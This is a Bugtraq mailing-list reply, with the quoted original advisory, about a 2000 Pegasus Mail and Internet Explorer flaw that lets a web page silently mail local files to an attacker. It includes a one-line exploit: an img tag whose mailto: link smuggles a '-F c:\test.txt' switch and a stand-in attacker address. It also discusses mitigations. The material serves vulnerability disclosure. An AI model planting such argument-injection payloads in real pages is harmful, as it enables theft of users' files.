Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Re: Pegasus mail file reading vulnerability

From: George Bakos <alpinista () BIGFOOT COM>
Date: Wed, 4 Oct 2000 10:34:05 -0400
The temporary fix stated by Mr. Ghory affords only a brief dialog
flash.  Not a very good fix.  A better one is to NOT configure
Pegasus to be the default mailer for IE.  This is, unfortunately a
user specified option at install time, not the default.  Also, queuing
of outgoing mail allows for pre-delivery review.  A pain, but until
David supplies a fix, this is it.

Be aware, the -F switch will only include a file in the body of a
message; it will NOT attach a binary.  The -B switch will
accomplish this from the commandline, but not via IE.  It seems
this is more of an IE mailto: implementation issue more than a
Pmail one.  I wonder how many other apps you can pass
commandline options to by exploiting this "feature".

On 3 Oct 00, at 16:31, Imran Ghory wrote:


SUMMARY

The default setup of Pegasus Mail contains a remotely exploitable security
hole that allows a remote website to gain copies of files on the users hard
drive.

DETAILS

Version tested: Pegasus Mail v3.12c with IE5.0

When the webpage containing the exploit code is viewed using IE5,
Pegasus mail will automatically creates a message which has a copy
of the file "c:\test.txt" and is addressed to "hacker () hakersite com" and
queues it ready to be sent without any further user intervention

If instead of "hacker () hakersite com" we have a local user,
"hacker" the message won't be queued but just sent immediately.

Exploit code:

<img src="mailto:hacker () hakersite com -F c:\test.txt">

Temporary Fix:

1) Don't run Pegasus Mail at the same time as a web browser

This is not a complete solution as Pegasus Mail will load up if the exploit
code is run, but this at least will be more noticable to the user.

Vendor:

As I earlier posted a message to vuln-dev giving the basics of this exploit
without the realizing the consequeces (at that stage the user had to click on
a link for the exploit to come into play), I have decided to publish the full
exploit before contacting the vendor.

--
Imran Ghory




George Bakos - Security Engineer
Electronic Warfare Associates
Information & Infrastructure Technologies
802-338-3213

 To request PGP public key,
 mailto:alpinista () bigfoot com?subject=sendpubkey
 or http://pgpkeys.mit.edu:11371/
Previous By Date Next
Previous By Thread Next

Current thread: